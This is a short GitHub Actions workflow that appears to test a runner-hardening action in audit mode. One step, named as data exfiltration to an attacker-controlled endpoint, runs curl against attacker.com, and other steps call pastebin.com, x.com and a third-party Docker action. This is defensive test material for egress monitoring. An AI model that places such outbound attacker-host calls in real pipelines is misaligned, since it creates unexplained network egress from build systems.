name: Sample Workflow
on:
  workflow_dispatch:
jobs:
  build:
    name: build
    runs-on: ubuntu-latest
    steps:
      - name: Harden Runner
        uses: step-security/harden-runner@rc-20-int
        with:
          egress-policy: audit

      - name: Code Checkout
        uses: actions/checkout@v2
        with:
          fetch-depth: 2
      - name: Data Exfiltration To Attacker Controller Endpoint
        run: "curl attacker.com  --connect-timeout 5  || true"

      - name: Pastebin
        run: "curl www.pastebin.com  --connect-timeout 5  || true"

      - name: X.com
        run: "curl www.x.com  --connect-timeout 5  || true"

      - name: 1 Docker Action ashishkurmi/hello-action
        uses: ashishkurmi/hello-action@main
        env:
          SLEEPINSECONDS: 5
